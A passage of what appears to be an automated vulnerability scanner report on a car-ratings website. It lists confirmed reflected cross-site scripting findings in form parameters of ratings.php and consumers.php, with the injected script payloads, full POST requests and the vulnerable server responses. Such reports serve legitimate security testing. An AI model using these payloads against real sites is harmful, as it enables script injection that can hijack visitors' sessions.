href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS 
Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div>
<table width="100%" class="text" cellpadding="5">
<tr>
<td width="150" align="left" valign="top"><div class="sidemenu_head">RESEARCH</div><div class="sidemenu_item"><a href="research.php">Overview</a></div><div class="sidemenu_item"> <a href="auto_research.php">Automotive</a></div><div class="sidemenu_item"><a href="govt_research.php">Government</a></div><div class="sidemenu_item"><a href="jury_research.php">Jury</a></div><div class="sidemenu_item"><a href="org_intervention.php">Organizational Intervention</a></div><div class="sidemenu_item"><a href="via_research.php">Values In America</a></div><div class="sidemenu_item"><a href="method.php">ValueCentered Method</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /></td>
<td align="left" valign="top">
<!-- Start the content -->
<div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="middle" />&nbsp;Automotive Ratings</div>
<div class="pagetext">

<p>Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p>
<p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."</p>

<p class="boldtext">View the top winners</p>
<ul>
<li><a href="auto_tqa_winners.php">Total Quality Winners</a></li>
<!-- <li><a href="auto_tva_winners.php">Total Value Winners</a></li> -->
<!--<li><a href="auto_mdv_winners.php">Most Delightful Winners</a></li>-->
<!--<li><a href="auto_pim_winners.php">Problem Impact Measure Winners</a></li>-->
</ul>

<div id="fieldset">
<div class="pagetitle_small">Select a car</div>
<form name="ratingsSelection" action="ratings.php" method="post">
<table border="0" cellpadding="2" cellspacing="0" class="text">
<tr>
<td width="65">Year</td>
<td width="135">Manufacturer</td>
<td colspan="2" width="200">Model</td>
</tr>
<tr>
<td><select name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011">2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td> </tr>
</table>

<div class="pagesubtitle">Cars you have selected</div>

<input type="hidden" name="numCars" id="numCars" size="1" value="3" />

<input type="hidden" name="yr1" id="yr1" value="3" />
<input type="hidden" name="mk1" id="mk1" value="3" />
<input type="hidden" name="mo1" id="mo1" value="'"--></style></script><script>netsparker(0x000A1C)</script>" />

<input type="hidden" name="yr2" id="yr2" value="3" />
<input type="hidden" name="mk2" id="mk2" value="3" />
<input type="hidden" name="mo2" id="mo2" value="3" />

<input type="hidden" name="yr3" id="yr3" value="" />
<input type="hidden" name="mk3" id="mk3" value="" />
<input type="hidden" name="mo3" id="mo3" value="" />

<input type="hidden" name="yr4" id="yr4" value="" />
<input type="hidden" name="mk4" id="mk4" value="" />
<input type="hidden" name="mo4" id="mo4" value="" />

<input type="hidden" name="yr5" id="yr5" value="" />
<input type="hidden" name="mk5" id="mk5" value="" />
<input type="hidden" name="mo5" id="mo5" value="" />

</form>

<table border="0" class="text boldtext">
<tr><td>1.</td><td width="300"><span id="car1"></span></td><td><span id="car1remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(1);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>2.</td><td><span id="car2"></span></td><td><span id="car2remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(2);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>3.</td><td><span id="car3"></span></td><td><span id="car3remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(3);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>4.</td><td><span id="car4"></span></td><td><span id="car4remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(4);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>5.</td><td><span id="car5"></span>..
- /ratings.php

/ratings.php CONFIRMED

http://www.strategicvision.com/ratings.php

Parameters

Parameter Type Value
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST 3
mo2 POST 3
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST '"--></style></script><script>alert(0x000A53)</script>
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /ratings.php HTTP/1.1
Referer: http://www.strategicvision.com/ratings.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=2tjcpjr4h1bgg92c16t9sq4fq0
Content-Length: 183
Expect: 100-continue
Accept-Encoding: gzip, deflate

numCars=3&yr1=3&mk1=3&mo1=3&yr2=3&mk2=3&mo2=3&yr3=3&mk3=3&mo3=3&yr4='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000A53)%3c%2fscript%3e&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:45:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html



<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Strategic Vision - Automotive Ratings</title>
<script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script>
<!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> 
<div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a 
href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS 
Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div>
<table width="100%" class="text" cellpadding="5">
<tr>
<td width="150" align="left" valign="top"><div class="sidemenu_head">RESEARCH</div><div class="sidemenu_item"><a href="research.php">Overview</a></div><div class="sidemenu_item"> <a href="auto_research.php">Automotive</a></div><div class="sidemenu_item"><a href="govt_research.php">Government</a></div><div class="sidemenu_item"><a href="jury_research.php">Jury</a></div><div class="sidemenu_item"><a href="org_intervention.php">Organizational Intervention</a></div><div class="sidemenu_item"><a href="via_research.php">Values In America</a></div><div class="sidemenu_item"><a href="method.php">ValueCentered Method</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /></td>
<td align="left" valign="top">
<!-- Start the content -->
<div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="middle" />&nbsp;Automotive Ratings</div>
<div class="pagetext">

<p>Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p>
<p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."</p>

<p class="boldtext">View the top winners</p>
<ul>
<li><a href="auto_tqa_winners.php">Total Quality Winners</a></li>
<!-- <li><a href="auto_tva_winners.php">Total Value Winners</a></li> -->
<!--<li><a href="auto_mdv_winners.php">Most Delightful Winners</a></li>-->
<!--<li><a href="auto_pim_winners.php">Problem Impact Measure Winners</a></li>-->
</ul>

<div id="fieldset">
<div class="pagetitle_small">Select a car</div>
<form name="ratingsSelection" action="ratings.php" method="post">
<table border="0" cellpadding="2" cellspacing="0" class="text">
<tr>
<td width="65">Year</td>
<td width="135">Manufacturer</td>
<td colspan="2" width="200">Model</td>
</tr>
<tr>
<td><select name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011">2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td> </tr>
</table>

<div class="pagesubtitle">Cars you have selected</div>

<input type="hidden" name="numCars" id="numCars" size="1" value="3" />

<input type="hidden" name="yr1" id="yr1" value="3" />
<input type="hidden" name="mk1" id="mk1" value="3" />
<input type="hidden" name="mo1" id="mo1" value="3" />

<input type="hidden" name="yr2" id="yr2" value="'"--></style></script><script>netsparker(0x000A53)</script>" />
<input type="hidden" name="mk2" id="mk2" value="3" />
<input type="hidden" name="mo2" id="mo2" value="3" />

<input type="hidden" name="yr3" id="yr3" value="" />
<input type="hidden" name="mk3" id="mk3" value="" />
<input type="hidden" name="mo3" id="mo3" value="" />

<input type="hidden" name="yr4" id="yr4" value="" />
<input type="hidden" name="mk4" id="mk4" value="" />
<input type="hidden" name="mo4" id="mo4" value="" />

<input type="hidden" name="yr5" id="yr5" value="" />
<input type="hidden" name="mk5" id="mk5" value="" />
<input type="hidden" name="mo5" id="mo5" value="" />

</form>

<table border="0" class="text boldtext">
<tr><td>1.</td><td width="300"><span id="car1"></span></td><td><span id="car1remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(1);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>2.</td><td><span id="car2"></span></td><td><span id="car2remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(2);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>3.</td><td><span id="car3"></span></td><td><span id="car3remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(3);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>4.</td><td><span id="car4"></span></td><td><span id="car4remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(4);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>5.</td><td><span id="car5"></span>..
- /ratings.php

/ratings.php CONFIRMED

http://www.strategicvision.com/ratings.php

Parameters

Parameter Type Value
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST 3
mo2 POST 3
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST '"--></style></script><script>alert(0x000A54)</script>
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /ratings.php HTTP/1.1
Referer: http://www.strategicvision.com/ratings.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=2tjcpjr4h1bgg92c16t9sq4fq0
Content-Length: 183
Expect: 100-continue
Accept-Encoding: gzip, deflate

numCars=3&yr1=3&mk1=3&mo1=3&yr2=3&mk2=3&mo2=3&yr3=3&mk3=3&mo3=3&yr4=3&mk4='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000A54)%3c%2fscript%3e&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:45:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html



<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Strategic Vision - Automotive Ratings</title>
<script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script>
<!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> 
<div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a 
href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS 
Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div>
<table width="100%" class="text" cellpadding="5">
<tr>
<td width="150" align="left" valign="top"><div class="sidemenu_head">RESEARCH</div><div class="sidemenu_item"><a href="research.php">Overview</a></div><div class="sidemenu_item"> <a href="auto_research.php">Automotive</a></div><div class="sidemenu_item"><a href="govt_research.php">Government</a></div><div class="sidemenu_item"><a href="jury_research.php">Jury</a></div><div class="sidemenu_item"><a href="org_intervention.php">Organizational Intervention</a></div><div class="sidemenu_item"><a href="via_research.php">Values In America</a></div><div class="sidemenu_item"><a href="method.php">ValueCentered Method</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /></td>
<td align="left" valign="top">
<!-- Start the content -->
<div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="middle" />&nbsp;Automotive Ratings</div>
<div class="pagetext">

<p>Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p>
<p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."</p>

<p class="boldtext">View the top winners</p>
<ul>
<li><a href="auto_tqa_winners.php">Total Quality Winners</a></li>
<!-- <li><a href="auto_tva_winners.php">Total Value Winners</a></li> -->
<!--<li><a href="auto_mdv_winners.php">Most Delightful Winners</a></li>-->
<!--<li><a href="auto_pim_winners.php">Problem Impact Measure Winners</a></li>-->
</ul>

<div id="fieldset">
<div class="pagetitle_small">Select a car</div>
<form name="ratingsSelection" action="ratings.php" method="post">
<table border="0" cellpadding="2" cellspacing="0" class="text">
<tr>
<td width="65">Year</td>
<td width="135">Manufacturer</td>
<td colspan="2" width="200">Model</td>
</tr>
<tr>
<td><select name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011">2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td> </tr>
</table>

<div class="pagesubtitle">Cars you have selected</div>

<input type="hidden" name="numCars" id="numCars" size="1" value="3" />

<input type="hidden" name="yr1" id="yr1" value="3" />
<input type="hidden" name="mk1" id="mk1" value="3" />
<input type="hidden" name="mo1" id="mo1" value="3" />

<input type="hidden" name="yr2" id="yr2" value="3" />
<input type="hidden" name="mk2" id="mk2" value="'"--></style></script><script>netsparker(0x000A54)</script>" />
<input type="hidden" name="mo2" id="mo2" value="3" />

<input type="hidden" name="yr3" id="yr3" value="" />
<input type="hidden" name="mk3" id="mk3" value="" />
<input type="hidden" name="mo3" id="mo3" value="" />

<input type="hidden" name="yr4" id="yr4" value="" />
<input type="hidden" name="mk4" id="mk4" value="" />
<input type="hidden" name="mo4" id="mo4" value="" />

<input type="hidden" name="yr5" id="yr5" value="" />
<input type="hidden" name="mk5" id="mk5" value="" />
<input type="hidden" name="mo5" id="mo5" value="" />

</form>

<table border="0" class="text boldtext">
<tr><td>1.</td><td width="300"><span id="car1"></span></td><td><span id="car1remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(1);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>2.</td><td><span id="car2"></span></td><td><span id="car2remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(2);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>3.</td><td><span id="car3"></span></td><td><span id="car3remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(3);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>4.</td><td><span id="car4"></span></td><td><span id="car4remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(4);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>5.</td><td><span id="car5"></span>..
- /consumers.php

/consumers.php CONFIRMED

http://www.strategicvision.com/consumers.php

Parameters

Parameter  Type  Value
Year       POST  3
numCars    POST  '"--></style></script><script>alert(0x000A67)</script>
yr1        POST  3
mk1        POST  3
mo1        POST  3
yr2        POST  3
mk2        POST  3
mo2        POST  3
yr3        POST  3
mk3        POST  3
mo3        POST  3
yr4        POST  3
mk4        POST  3
mo4        POST  3
yr5        POST  3
mk5        POST  3
